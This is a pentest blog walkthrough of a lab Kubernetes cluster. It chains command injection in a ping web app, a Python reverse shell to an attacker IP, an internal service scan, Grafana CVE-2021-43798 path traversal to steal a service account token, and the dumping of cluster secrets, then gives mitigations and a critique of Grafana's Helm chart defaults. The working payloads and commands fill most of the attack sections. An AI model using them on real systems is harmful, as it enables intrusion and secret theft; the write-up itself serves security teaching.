Privilege Escalation in Kubernetes

A Practical Look at Horizontal Privilege Escalation in Kubernetes

Written on Tue Dec 12 2023
8 minute read
pentest
grafana
kubernetes

Introduction

This article covers a real-world scenario of how an attacker might escalate privileges horizontally in a Kubernetes cluster.

The code repository for this article is available on GitHub.

Synopsis

We have a web application running on a Kubernetes cluster. It is a simple application that lets us check whether an element is connected to the internet. Our goal is to exploit it to get a shell on the pod that runs it.

Our target will be the web application running on http://localhost:8080.

Discovery

Grabbing metadata

We have a web application running on port 8080, which we can access from a browser.

When I'm performing a pentest, I like to use the following command to grab the web application's banner and get quick insights about it:

curl -IL http://localhost:8080

This gave us the following result:

HTTP/1.1 200 OK
Server: Werkzeug/2.3.4 Python/3.9.16
Date: Sun, 21 May 2023 13:41:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1627
Connection: close

We can see that the web application is served by the Werkzeug web server running on Python 3.9.16.

This information is crucial for the discovery phase: now I know what kind of application is running and which runtime powers it.

Exploring the web application

Opening my web browser and navigating to http://localhost:8080 gave me the following page:

Application homepage

This page is pretty simple: we can enter a domain or IP address and the application will tell us whether that element is connected to the internet.

(This scenario is intentionally very explicit to make the article easier to understand.) Testing the application using www.google.com

We can see that the application works as expected. More precisely, we see that it uses the ping command to check whether the element is connected to the internet. At this point, an attacker can already start thinking about how to exploit the application. There are multiple ways to do so, but we will focus on command injection.

Command injection is part of the OWASP Top 10, where it is ranked 3rd in the 2021 edition (A03:2021-Injection).

Exploiting the application

Inside the web application there is a form input that allows us to enter a value, and the prompt shows that the output is simply the response of the Linux command ping <value> run on the server. We can try some command injection using | and ;. For example, ; ls shows us the web server's source code.

Testing command injection

Note: This works because the web application executes shell commands on the server; the injection is possible because the user input is not sanitized.
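To see why the ; does the trick, suppose the backend naively concatenates the user input into a shell string (an assumption about the server code, which we have not seen). Submitting 8.8.8.8; ls then makes the server effectively run:

# Hypothetical server-side execution when the input is "8.8.8.8; ls":
sh -c "ping -c 1 8.8.8.8; ls"   # ';' is a command separator: ping runs, then ls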

Using that command injection, we can try to get a reverse shell on the server. If you don't know this concept, here is a simple explanation: How a reverse shell works

As a reminder, during the reconnaissance phase we saw that the web application is running on Python 3.9.16. We can use this information to spawn a reverse shell on the server with some Python code. To make the server initiate a connection to our machine, we can inject the following command:

; python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<YOUR_IP>",9001)); os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); import pty; pty.spawn("/bin/bash")'

Don't forget to replace <YOUR_IP> with your own IP address. Here we use the shell's capabilities to inject our commands in place of the standard input. This command spawns a reverse shell on the server, but we first have to listen on port 9001 from our machine to catch it.

nc -lvnp 9001

When the Python code is interpreted, the server initiates a connection to the IP and port provided (in our case, our laptop).

Gaining access

Now that we have a shell on the server, we can start to explore it and try to find some interesting information.

At this step it's important to take precautions and not do anything that could alert the system administrator. As this demonstration is intentionally simple, we will not take any.

We can try, for example, to get information by listing the environment variables.

env

Using this command, we can see that the server is running inside a Kubernetes cluster.
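Every pod gets service-discovery environment variables injected by Kubernetes, so the output typically contains lines like these (the addresses will differ per cluster):

KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.96.0.1:443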

We can try to list the pods running on the cluster using the following command:

# Get the service account token of the pod
export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
# Interact with the cluster using the REST API
curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/pods" -m 3 --insecure

Unfortunately, our pod doesn't have the permission to list the pods running on the cluster. But we can try to discover cluster resources through other methods.

For example, Kubernetes Service resources are typically allocated from the 10.96.0.0/16 range (the exact CIDR depends on the cluster's service-cluster-ip-range setting). We can try to discover other services with a simple script that attempts to connect to every IP address in the range on the specified ports.

#!/bin/bash
# Set the timeout value (in seconds)
timeout=0.03
# Loop through each IP address in the range 10.96.0.0/16
for third_octet in {0..255}; do
  for fourth_octet in {0..255}; do
    ip="10.96.$third_octet.$fourth_octet"

    # Loop through each port
    while read -r port; do
      url="http://${ip}:${port}"
      response_code=$(curl -s -o /dev/null -w "%{http_code}" --max-time $timeout "$url")

      if [[ $response_code -ge 200 && $response_code -lt 400 ]]; then
        echo "Success: $url (HTTP $response_code)"
        # Continue testing other combinations
      fi
    done < "ports.txt"
  done
  echo "Range 10.96.$third_octet.0/24 done"
done

Note that you have to create a file named ports.txt that contains the ports you want to test. For the demo, you can scope the list to port 3000.
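For example (one port per line; widen the list as needed):

# Scope the scan to port 3000 only
echo "3000" > ports.txt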

We can now launch the script and do some internal recognition.

Scanning the cluster services

Our script found a service running on the IP 10.96.57.212. As it is an internal IP, you will only be able to access it from inside the cluster.

We can set the IP in a variable to use it later:

export TARGET_IP=10.96.57.212

We can restart our discovery process on this IP address. For example, I ran the following command to grab the banner:

curl -IL http://$TARGET_IP:3000

Here I notice that we are redirected to the URL http://10.96.57.212:3000/login, so I can curl this page to get its content.

curl http://$TARGET_IP:3000/login

This appears to be a Grafana dashboard login page.

Horizontal privilege escalation

Attacking Grafana

Get the running Grafana version:

curl http://$TARGET_IP:3000/login | grep "subTitle"

You should find that the running Grafana is outdated; furthermore, version 8.3.0 is well known to be vulnerable to CVE-2021-43798.

Damn, it's vulnerable!

If you inspect the CVE information and the exploit code, you can see that an endpoint lets us read files on the Grafana server without being authenticated. The endpoint is /public/plugins/alertlist/../../../../../../../../etc/passwd

This vulnerability is a path traversal: it allows injecting relative paths into the URL to reach files on the server. In our case, it also allows us to read the file contents.

We can try to get the content of the /etc/passwd file using the following command:

curl --path-as-is http://$TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

Reading /etc/passwd. Damn, we can read the /etc/passwd file. That means we can read any file on the server. Obviously that's already a nice catch, but as a reminder, we are on a Kubernetes cluster: we can get cooler stuff ;)

Kubernetes assigns a ServiceAccount to each pod, giving it an identity and, through role bindings, permissions. As described in the documentation, the ServiceAccount token of your Pod is provisioned by Kubernetes on the pod filesystem at this location: /var/run/secrets/kubernetes.io/serviceaccount/token

Combining this Grafana vulnerability with that knowledge, we can grab the Grafana service account token and use it to interact with the cluster.

curl --path-as-is http://$TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

You can check what's in the JWT on JWT.io

Impersonating the Grafana service account

export TOKEN=$(curl --path-as-is http://$TARGET_IP:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token)
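If you prefer not to paste the token into a third-party site, you can also decode it locally. A minimal sketch: a JWT is three base64url-encoded parts separated by dots, and the payload is the second one.

# Extract and decode the JWT payload; tr converts base64url to base64,
# and base64 may warn about missing padding but still prints the JSON.
echo "$TOKEN" | cut -d '.' -f 2 | tr '_-' '/+' | base64 -d 2>/dev/null; echo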

At this step we own the Grafana ServiceAccount token, allowing us to query the cluster as if we were the Grafana pod, with the Grafana ServiceAccount's permissions.

Now we are able to get more information about the cluster, as Grafana has more permissions than our initial pod.

For example, you can try to list the namespaces of your cluster:

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/namespaces" -m 3 --insecure

Unfortunately, we can't list the namespaces... Let's try something else: listing pods.

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/pods" -m 3 --insecure

Important: As you are using the Grafana ServiceAccount, you will only see the pods that are in the same namespace as Grafana. But you can change the namespace in the URL to look at other resources.

For example, you can try to list the pods in the kube-system namespace:

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/pods" -m 3 --insecure

Okay, it seems that there are no other pods on the cluster; let's try to get secrets.

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/secrets" -m 3 --insecure

For example, you can try to list the secrets in the kube-system namespace:

curl -H "Authorization: Bearer $TOKEN" "https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/secrets" -m 3 --insecure

Getting kubernetes secrets

The secret values are base64-encoded; if you want to decode one, you can use the following command:

echo <SECRET_VALUE> | base64 -d
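If jq is available where you run the curl commands, here is a sketch that lists and decodes every value of the returned secrets in one pass (jq 1.6+ provides the @base64d filter):

curl -s -H "Authorization: Bearer $TOKEN" \
  "https://kubernetes.default.svc:443/api/v1/namespaces/kube-system/secrets" --insecure \
  | jq -r '.items[] | .metadata.name as $n | (.data // {}) | to_entries[] | "\($n)/\(.key): \(.value | @base64d)"'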

Why can Grafana get all secrets?

It can appear strange that Grafana can list all the secrets in the cluster. The explanation is that the Grafana ServiceAccount is bound to a ClusterRole. For those who are not familiar with it: ClusterRole resources define permissions over the whole cluster and are not scoped to namespaces. If you need permissions scoped to a namespace, you use a Role instead.
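To make the difference concrete, here is a sketch with kubectl (the names and the monitoring namespace are illustrative):

# Cluster-wide: can read Secrets in EVERY namespace
kubectl create clusterrole secret-reader --verb=get,list,watch --resource=secrets

# Namespace-scoped: can read Secrets only in the 'monitoring' namespace
kubectl create role secret-reader --verb=get,list,watch --resource=secrets -n monitoring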

The funny part is that some friends told me: "no one gives a cluster role to Grafana".

So I decided to investigate, looking at the official Helm chart for example: https://github.com/grafana/helm-charts/tree/main/charts/grafana

And I found this in the template named clusterrole.yaml:

{{- if and .Values.rbac.create (or (not .Values.rbac.namespaced) .Values.rbac.extraClusterRoleRules) (not .Values.rbac.useExistingClusterRole) }}
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    {{- include "grafana.labels" . | nindent 4 }}
  {{- with .Values.annotations }}
  annotations:
    {{- toYaml . | nindent 4 }}
  {{- end }}
  name: {{ include "grafana.fullname" . }}-clusterrole
{{- if or .Values.sidecar.dashboards.enabled .Values.rbac.extraClusterRoleRules .Values.sidecar.datasources.enabled .Values.sidecar.plugins.enabled .Values.sidecar.alerts.enabled }}
rules:
  {{- if or .Values.sidecar.dashboards.enabled .Values.sidecar.datasources.enabled .Values.sidecar.plugins.enabled .Values.sidecar.alerts.enabled }}
  - apiGroups: [""] # "" indicates the core API group
    resources: ["configmaps", "secrets"]
    verbs: ["get", "watch", "list"]
  {{- end}}
  {{- with .Values.rbac.extraClusterRoleRules }}
  {{- toYaml . | nindent 2 }}
  {{- end}}
{{- else }}
rules: []
{{- end}}
{{- end}}

The interesting line is this one:

if and .Values.rbac.create (or (not .Values.rbac.namespaced)

To know what the default configuration is, we have to refer to the chart's values.yaml

And here it is:

global:
  imageRegistry: null
  imagePullSecrets: []

rbac:
  create: true
  pspEnabled: false
  pspUseAppArmor: false
  namespaced: false
  extraRoleRules: []

So, by default, the Grafana helm chart gives your Grafana deployment a ClusterRole with the permission to get, watch, and list all Secrets and ConfigMaps on the cluster.

Interesting, right?

At the moment I can't figure out why they did this, but I will try to contact them to get more information.

Mitigation

It's important to audit your configuration and scope out security issues, but it's even more important to build mitigations that prevent this kind of issue.

In our case we have two main problems. The first is the vulnerability in our webapp; this could easily be detected using some SAST tooling. If you want more information on how to secure your pipeline, I recommend my previous article: Why DevOps guy have to care about cybersecurity
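As an illustration (one option among many, assuming a Python webapp), a scanner like Semgrep will flag shell-injection patterns such as subprocess calls built from user input:

# Run Semgrep's curated Python ruleset against the webapp source
semgrep --config p/python path/to/webapp/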

The second issue is the ClusterRole given to Grafana. This is a more complex issue because it's not a vulnerability, it's a misconfiguration, and that kind of misconfiguration is not easy to detect.

I brainstormed a little bit about this issue. Of course, giving a Role instead of a ClusterRole considerably improves your security in case of compromise, but we can do more.
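With the official chart, one quick win is to opt into namespaced RBAC so that the chart renders a Role instead of a ClusterRole (a sketch, assuming a release named grafana in the monitoring namespace):

helm upgrade grafana grafana/grafana \
  --namespace monitoring \
  --set rbac.namespaced=true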

Grafana doesn't need to be reachable by arbitrary cluster resources, and it should only pull from certain pods, such as Prometheus. You could implement a network policy that blocks all ingress traffic to Grafana (except from your front dashboard/ingress) and allows egress only to DNS servers and Prometheus agents (if you use Grafana with Prometheus).
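A minimal sketch of such a policy, applied with a heredoc (the monitoring namespace, the label selectors, and the Prometheus port are assumptions to adapt to your setup):

kubectl apply -f - <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: grafana-lockdown
  namespace: monitoring                            # assumption: where Grafana runs
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: grafana              # assumption: chart default label
  policyTypes:
    - Ingress
    - Egress
  ingress:
    - from:
        - podSelector:
            matchLabels:
              app.kubernetes.io/name: ingress-nginx   # assumption: your front/ingress
      ports:
        - port: 3000
  egress:
    - to:
        - podSelector:
            matchLabels:
              app.kubernetes.io/name: prometheus      # assumption: your Prometheus
      ports:
        - port: 9090
    - ports:                                       # always allow DNS resolution
        - port: 53
          protocol: UDP
        - port: 53
          protocol: TCP
EOF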

Conclusion

In this article you saw how a misconfigured Grafana instance can lead to a full cluster compromise.

There are important lessons to retain from this simple demonstration. First, keep your applications and dependencies updated, and check for vulnerabilities often. Second, if one pod of your cluster is compromised, it can query the whole cluster and enable horizontal escalation; don't trust your pods, and always grant the minimum permissions needed.

And most important of all: always pay attention to default configurations. Do not blindly trust a vendor.